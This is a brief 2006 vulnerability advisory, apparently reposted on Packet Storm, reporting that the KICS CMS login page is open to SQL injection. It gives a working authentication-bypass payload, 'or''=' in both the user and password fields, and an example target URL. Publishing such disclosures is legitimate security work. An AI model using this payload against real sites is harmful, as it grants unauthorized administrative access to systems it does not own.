KICS cms suffers from an SQL injection vulnerability that can be used to gain administrative privileges.
c63da37314a6840ff5959a53f296ea306761576606a8d1acabaa3afa922df13b***********************
* Tunis the 18/10/2006*
* bug found by fireboy*
***********************
product:KICS CMS
vendor:http://www.kinesis.com.au/
there is an sql injection problem in KICS CMS login page and it can be exploited to gain admin privileges.
exploit:
user: 'or''='
pass: 'or''='
example:http://www.target.com/kicscms/index.asp
thx
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed